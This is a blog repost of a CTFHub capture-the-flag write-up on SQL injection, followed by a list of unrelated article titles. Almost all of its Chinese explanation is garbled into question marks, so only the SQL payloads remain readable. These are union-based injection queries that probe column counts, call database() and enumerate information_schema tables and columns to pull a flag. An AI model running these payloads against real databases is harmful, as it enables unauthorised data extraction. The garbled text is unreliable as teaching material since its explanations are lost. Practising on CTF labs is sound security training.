CTFHub技能树web-sql注入

阅读量：294 次

发布时间：2019-03-01

本文共 1499 字，大约阅读时间需要 4 分钟。

???????????????????

??????????

??????????????????????????????????????SQL?????????????select * from news where id=1 order by 1???????????????????????????

????SELECT??????

?????????????????????SQL???select * from news where id=1 and 1=2 union select 1,database()

??????union?????????database()??????????????????????????????

????????????????

????????????????group_concat????columns??????????????????????????select * from news where id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

??????????????????????????

??????????????

????????????information_schema????????????????????????????????????select * from information_schema.tables where table_schema='sqli'

???group_concat??????????????????????????

????`union`?????

union????????????????????????SELECT???????????????????????????????????select * from news where id=1 and 1=2 union select 1,database()

???????????

??????????????????SQL???select * from information_schema.databases

????????????????????????????????

?????????????

?????????????????????select count(*) from information_schema.tables where table_schema='sqli'

??????????????????????

?????????????

???????????????????????select table_name from information_schema.tables where table_schema='sqli'

????????????????????

???????????????

?????????????????select column_name from information_schema.columns where table_name='flag'

?????????????

?????????????????

???????????????????????select * from sqli.flag

????????????????????????????????

转载地址：http://zhlx.baihongyu.com/

你可能感兴趣的文章

No fallbackFactory instance of type class com.ruoyi---SpringCloud Alibaba_若依微服务框架改造---工作笔记005

No Feign Client for loadBalancing defined. Did you forget to include spring-cloud-starter-loadbalanc

No mapping found for HTTP request with URI [/...] in DispatcherServlet with name ...的解决方法

No module named 'crispy_forms'等使用pycharm开发

No module named cv2

No module named tensorboard.main在安装tensorboardX的时候遇到的问题

No module named ‘MySQLdb‘错误解决No module named ‘MySQLdb‘错误解决

No new migrations found. Your system is up-to-date.

No qualifying bean of type XXX found for dependency XXX.

No resource identifier found for attribute 'srcCompat' in package的解决办法

no session found for current thread

No toolchains found in the NDK toolchains folder for ABI with prefix: mips64el-linux-android

NO.23 ZenTaoPHP目录结构

NO32 网络层次及OSI7层模型--TCP三次握手四次断开--子网划分

NoClassDefFoundError: org/springframework/boot/context/properties/ConfigurationBeanFactoryMetadata

Node JS： < 一> 初识Node JS

Node-RED中使用JSON数据建立web网站

Node-RED中使用json节点解析JSON数据

Node-RED中使用node-random节点来实现随机数在折线图中显示

Node-RED中使用node-red-browser-utils节点实现选择Windows操作系统中的文件并实现图片预览